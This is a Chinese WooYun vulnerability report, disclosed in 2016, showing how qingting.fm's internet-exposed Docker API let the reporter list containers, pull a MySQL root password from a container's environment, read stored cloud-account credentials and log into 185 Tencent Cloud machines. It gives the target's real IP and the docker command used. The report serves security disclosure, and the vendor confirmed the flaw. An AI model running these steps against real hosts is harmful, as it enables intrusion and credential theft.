当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0209305

漏洞标题:新姿势之控制蜻蜓fm所有服务器

相关厂商:qingting.fm

漏洞作者: 黑客,绝对是黑客

提交时间:2016-05-16 15:18

修复时间:2016-07-01 12:50

公开时间:2016-07-01 12:50

漏洞类型:敏感信息泄露

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2016-05-16: 细节已通知厂商并且等待厂商处理中
2016-05-17: 厂商已经确认,细节仅向厂商公开
2016-05-27: 细节向核心白帽子及相关领域专家公开
2016-06-06: 细节向普通白帽子公开
2016-06-16: 细节向实习白帽子公开
2016-07-01: 细节向公众公开

简要描述:

新姿势就是diao,轻轻松松拿服务器

详细说明:

docker engine daemon api直接暴露公网

121.41.33.174:2375


查看当前运行container

docker -H tcp://121.41.33.174:2375 ps
CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES
f6fbb2693387 reg.a.qingtingfm.com:5001/qtcontent/python-graphviz:0.1 "/venv/bin/python /co" 5 weeks ago Up 4 days 0.0.0.0:80->8080/tcp devmeta_app_1
85c0a2aea047 python:3.5 "/venv/bin/python /co" 5 weeks ago Up 4 days 0.0.0.0:7070->7070/tcp devmeta_api_1
81de7bf79ed0 mysql "/entrypoint.sh mysql" 5 weeks ago Up 4 days 0.0.0.0:3306->3306/tcp devmeta_mysql_1


看了下container devmeta_mysql_1 运行着mysql数据库,inspect下,获取到帐号密码

{
"Config": {
"Env": [
"MYSQL_ROOT_PASSWORD=******",
"PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
"MYSQL_MAJOR=5.7",
"MYSQL_VERSION=5.7.11-1debian8"
]
}
}


3306端口开放,连接之,有个用户表account,存的是各idc的帐号密码

data.png


登录腾讯云试试,成功

tengxunyun1.png


185台机器

tengxunyun2.png


机器详情

tengxunyun3.png


其他帐号就不试了

漏洞证明:

拿shell,参考
WooYun: 新姿势之获取果壳全站代码和多台机器root权限

修复方案:

版权声明:转载请注明来源 黑客,绝对是黑客@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2016-05-17 12:47

厂商回复:

非常感谢,确实为重要安全问题

最新状态:

暂无